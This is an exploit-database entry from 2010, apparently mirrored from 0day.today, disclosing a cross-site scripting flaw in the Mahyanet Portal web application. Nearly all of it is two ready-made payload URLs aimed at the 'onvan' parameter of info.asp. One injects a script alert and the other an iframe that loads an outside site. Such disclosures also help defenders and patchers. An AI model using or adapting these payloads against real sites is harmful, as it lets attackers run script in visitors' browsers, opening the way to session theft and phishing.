id: 12426
date: 05/28/2010
title: Mahyanet Portal XSS Vulnerability
author: M4st3r_4w4r3
cves: 

=================================
Mahyanet Portal XSS Vulnerability
=================================


# Exploit Title: Mahyanet Portal XSS Vulnerability
# Date: 2010/05/28
# Author: M4st3r_4w4r3
# Version: All version
# category: XSS
# Code :

http://[target]/info.asp?page=fullstory&key=1&news_type=news&onvan=<script>alert('XSS')</script>

or

http://[target]/info.asp?page=fullstory&key=1&news_type=news&onvan=<iframe
height=500 width=800 src=%22HTTP://inj3ct0r.com%22>;

#  0day.today [2023-03-27]  #